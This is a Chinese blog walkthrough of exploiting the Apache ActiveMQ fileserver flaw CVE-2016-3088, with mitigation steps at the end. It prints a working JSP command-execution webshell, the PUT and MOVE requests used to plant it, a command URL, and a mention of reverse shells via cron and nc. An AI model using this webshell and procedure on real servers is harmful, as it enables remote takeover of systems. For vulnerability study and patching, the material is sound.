Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)案例分析

部署ActiveMQ运行环境

在linux上部署apache-activemq-5.10.0-bin.tar.gz

通过tar -zxvf  apache-activemq-5.10.0-bin.tar.gz解压mq

 

由于是弱密码,所以可以直接密码登录admin/admin

注意:

如果是密码错误或者不输入密码,则显示如下

 

 

输入正确的密码后,通过BurpSuite抓包如下

抓包如下:

改成PUT方法:

此时,htxk.jsp内容为空

重新生成htxk.jsp,文件内容为jsp一句话木马

<%@ page import="java.io.*"%>
<%
    out.print("Hello</br>");
    String strcmd = request.getParameter("cmd");
    String line =null;
    Process p=Runtime.getRuntime().exec(strcmd);
     InputStream is = p.getInputStream();
      BufferedReader br = new BufferedReader(new InputStreamReader(is));
    while((line =br.readLine())!=null){
        out.print(line+"<br>");
    }
%>

 

查看是否可以执行

可惜没有权限执行

爆出mq的绝对路径

然后利用 MOVE 方法将 Webshell 移入 admin/ 目录(也可以利用相对路径)

MOVE /fileserver/htxk.jsp HTTP/1.1
Destination: file:///home/local/apache-activemq-5.10.0/webapps/admin/htxk.jsp
Host: 192.168.10.106:8161

访问http://192.168.10.106:8161/admin/htxk.jsp?cmd=ls ,命令成功执行,效果如下

解决方法:

5. 漏洞防护方案

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

2、通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能

修复成功

 

存在漏洞的配置:

 

 

https://paper.seebug.org/346/

https://www.seebug.org/vuldb/ssvid-96268

 

转载于:https://www.cnblogs.com/qmfsun/p/7504875.html

CVE-2016-3088是指Apache ActiveMQ中的一个安全漏洞。该漏洞允许攻击者通过特制的HTTP请求在目标服务器上执行任意命令。\[1\]为了利用这个漏洞,攻击者需要上传一个包含恶意代码的文件,并将其移动到能够执行JSP文件的文件夹中。然后,攻击者可以通过访问目标文件来执行命令并获取返回的数据。\[3\]为了实现计划任务反弹,攻击者还可以将文件移动到/etc/cron.d目录下,并使用nc命令监听指定端口等待回显。\[3\] 修复这个漏洞的方法是升级Apache ActiveMQ到5.14或更高版本。5.14及以后的版本取消了fileserver应用,从而消除了这个漏洞的风险。\[3\]如果升级会对目前业务持续性产生影响,可以通过改写配置文件来解决问题。具体来说,可以修改ActiveMQ根目录下conf目录中的jetty.xml文件,将fileserver相关行进行注释操作。\[3\]更多关于该漏洞的信息可以参考Apache ActiveMQ的安全公告。\[3\] #### 引用[.reference_title] - *1* *2* [ActiveMQ远程代码执行漏洞(CVE-2016-3088)](https://blog.csdn.net/weixin_44047654/article/details/128033455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2016-3088](https://blog.csdn.net/weixin_52084568/article/details/129194108)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值